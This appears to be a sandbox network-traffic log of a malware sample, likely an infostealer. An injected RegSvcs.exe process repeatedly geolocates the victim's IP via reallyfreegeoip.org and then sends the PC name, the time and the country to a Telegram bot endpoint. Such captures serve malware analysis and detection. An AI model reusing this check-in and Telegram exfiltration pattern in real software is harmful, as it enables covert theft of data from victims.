2025-01-08 14:44:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:07 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662236 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCBc%2Bjf6JQhAh5YNvjmrwAAEAhL%2BEHjxWdFK5882M9YTJhSQS9x48q8xtFqo2GJA4cnO7Cjjyk1iO92Ey4gZxAs0O%2BwowFul0gXFmnCn2CvxHJS5nYiHOD%2Fhs4KaFXS4pwNR0P6f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6b94b691875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1697&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1702623&cwnd=153&unsent_bytes=0&cid=a87431826dbe8dbc&ts=176&x=0"
2025-01-08 14:44:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:08 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:08 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662237 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQ5bTs%2BwojQejyAbihLGe%2FCFdqKzHz2mJKppdM5kP3hDfTYU6lvoySqnHqzxnZdvlhoDh7Dfa6vtchgmPD8u3VqDfIGbdiKGXtp8xbY%2BemUJO%2Busx2wNKUbALyE7DQuPDW2LwICW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6c209694315-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1593&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1768625&cwnd=218&unsent_bytes=0&cid=138fa5eb47b30278&ts=169&x=0"
2025-01-08 14:44:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:09 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:10 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662239 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgPn3mKfGXQ6B5xxFYYI77aEAoNn%2BO5VM%2BxqhKAlzHjpt8O8CG3axBkF%2FZwsjOh6yGDlYFXaqfF6tb9TOjvKtWP9rB9dipMzCP%2BhNFhYXc2Zq15iPds2HMVTAEtrvSdQgpPdX%2BOa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6ca398d41ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1742&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1560662&cwnd=252&unsent_bytes=0&cid=f879c25afee12ee0&ts=160&x=0"
2025-01-08 14:44:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:11 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662240 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zv4Ooz1k0osUMrGIKaCSlC%2BnTMSNZlQAk%2F4jbuj0oN1mHKAvhDeXBXVdwCzKCJHRTZjtEdsu0kOq%2FtYp2k%2Fmv9rt5ORI7kWbTnLqIJopB9mXx63I81hBVvFvom3ADz3t0Des3Zr%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6d299d6c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1505&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1684939&cwnd=181&unsent_bytes=0&cid=e1289ed93d861074&ts=165&x=0"
2025-01-08 14:44:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:12 UTC	851	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662241 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFXDRcgApKSGBQB5u8iLHUa4I4tnaq93NFiiIFwjsorfOFzKOuaIVrnMaxoXw8Sskp4QGGtSIogdAd%2BdOZzIQjiMLCbi70TKWSDz2OiVxwlltpRWQQ5E1QwNzLq8e5dO16OPvex4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6dadafa1889-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1701&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1689814&cwnd=252&unsent_bytes=0&cid=50e514f6dfba60eb&ts=140&x=0"
2025-01-08 14:44:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49716	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:13 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:13 UTC	853	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662243 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFnNRp6uzWzr57bLV12pa8Az550Q7DzmyyHllVXNQv9qJCrkghXnYg1efNTsP06%2Bl0aqsB6PlWFL9LxMU0fZfvdjWZCuUQT5XytAggv1COSRyyUPXLHVCorjLKY0DetUu%2FYRgc5J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6e2d9db41f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1755&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1642294&cwnd=216&unsent_bytes=0&cid=68a7037852d2f85b&ts=136&x=0"
2025-01-08 14:44:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:15 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662244 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fqsk1UO5xvE90OWjZzVsBQQDuw5Ny700pV61eeFnN2pHLxCGnpFiirf%2B1cAp9JCOLsf0rdeyFu27NRVKBlQMxC8Kt7JISjDEBa60gBdZjy1LqgjSsybNpSl%2Bmh%2BDYp1%2BgBL9L4yX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6eb2ad641e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1758&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1658148&cwnd=202&unsent_bytes=0&cid=aa96ac6d14286d17&ts=158&x=0"
2025-01-08 14:44:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49723	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:16 UTC	855	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662245 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyM2AWveCHdi7kJY0hfN61QU9IcIPfHzdVHGS7eHPl8HXPAKZttqreH30ezXqf%2B0ZJmJl4TttL3S91VW%2FHM33ZFqUkpin1mdysopZzljIF1yNwVWTZAPIKOaRN3t8xvDsc6v5%2FHi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6f339dd0fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1534&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1903520&cwnd=220&unsent_bytes=0&cid=daf01a169c33856b&ts=145&x=0"
2025-01-08 14:44:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49726	149.154.167.220	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:17 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-08 14:44:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 14:44:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-08 14:44:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49760	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:23 UTC	863	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662252 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Op5SoDcgSziHEnx%2B7dWhdYlwIVl%2Fas%2FpY%2FJvQj6XPPG7i%2FcRxVPCCW20zgwhzX%2FXZZ1FVJhHATmv%2FpwtiwAhDJ4UNI1bjxLIzaipLBw9lq0QAJX5fxZk3cvajFGEVneF2djU4dov"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf71c78e843f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1550&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1737061&cwnd=213&unsent_bytes=0&cid=91828614e4aa127d&ts=436&x=0"
2025-01-08 14:44:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 